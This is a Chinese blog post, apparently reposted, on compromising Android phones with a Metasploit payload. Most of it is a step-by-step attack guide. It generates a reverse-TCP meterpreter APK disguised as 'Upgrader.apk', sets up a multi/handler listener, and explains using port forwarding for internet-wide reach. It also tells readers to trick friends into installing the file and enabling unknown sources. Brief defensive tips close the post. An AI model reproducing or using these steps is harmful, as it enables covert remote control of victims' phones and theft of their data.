黑客如何使用payload远程访问Android
2023-5-28 20:1:59 Author: 网安之道(查看原文) 阅读量:15 收藏

在当今数字化时代,越来越多的人使用智能手机来存储和处理个人信息,因此保护手机安全变得尤为重要。然而,黑客们却能够通过各种手段攻击手机系统,其中一种常见的方式就是使用payload远程访问Android系统。在这篇文章中,我们将探讨黑客如何使用payload攻击Android系统,并提供一些防范措施,以帮助用户保护自己的手机安全。这是一个解释如何使用 Kali 破解安卓手机的教程。我看不到任何解释此 Hack/Exploit 的教程,因此,我制作了一个教程。

步骤 1. 启动 Kali:

打开一个终端,制作一个 Trojan .apk

可以通过键入以下内容来执行此操作:

msfpayload android/meterpreter/reverse_tcp LHOST=自己的IP R > /root/Upgrader.apk

(把LHOST换成你自己的IP)

还可以通过 Interet 在 LHOST 中  使用公共/外部 IP和端口转发在 WAN上破解 android

步骤 2.打开另一个终端:

  • 打开另一个终端,直到生成文件。

  • 加载 metasploit 控制台,输入:msfconsol

步骤 3.设置监听器:

  • 加载后通过键入以下内容加载多处理程序漏洞利用:

 use exploit/multi/handler

  • 通过键入以下内容设置(反向)有效载荷:

  set payload android/meterpreter/reverse_tcp
  • 设置 L 主机类型:  设置LHOST 192.168.0.4

第 4 步。利用!

  • 最后输入:exploit 启动监听器。

  • 将制作的应用程序 (Upgrader.apk) 从根文件夹复制到自己的Android 手机。

  • 然后使用上传到 Dropbox 或任何共享网站并将其发送。

  • 然后将网站给你的链接发送给你的朋友并利用他们的手机(仅限局域网,但如果你使用 WAN 方法,那么你可以在互联网上的任何地方使用漏洞)

  • 让受害者安装 Upgrader 应用程序(因为他认为这是为了升级他手机上的某些功能)

  • 但是,应从 Android 手机的安全设置中启用(如果未启用)允许安装来自未知来源的应用程序选项  ,以允许安装特洛伊木马。

  • 当目标点击打开时……

第 5 步.上线!

出现meterpreter提示:

防范措施:

1.及时更新系统和应用程序:Android系统和应用程序的更新通常包含安全补丁,可以修复已知的漏洞和安全问题。因此,及时更新系统和应用程序可以帮助用户保持设备的安全。2.下载应用程序时要谨慎:用户应该只从可信的应用商店下载应用程序,并避免从未知来源下载应用程序。此外,用户应该仔细阅读应用程序的权限请求,并确保应用程序只请求必要的权限。

3.安装安全软件:安装安全软件可以帮助用户检测和阻止恶意软件和payload的攻击。用户应该选择可信的安全软件,并定期更新软件以确保其有效性。

4.使用强密码和双重身份验证:用户应该使用强密码来保护他们的设备和应用程序,并启用双重身份验证以增强账户的安全性。

5.避免使用公共Wi-Fi:公共Wi-Fi网络通常不安全,攻击者可以使用中间人攻击等技术来窃取用户的数据。因此,用户应该避免使用公共Wi-Fi网络,或者使用VPN等安全工具来保护他们的数据。


文章来源: http://mp.weixin.qq.com/s?__biz=MzIxMDI2ODM1OA==&mid=2651502075&idx=1&sn=08602e80fbcdf45d9dc2415e68e768e4&chksm=8c992c52bbeea5445ff6e098a22e3f5d270618fc3677b6127cc3137643a6837b6ab0526f5980#rd
如有侵权请联系:admin#unsafe.sh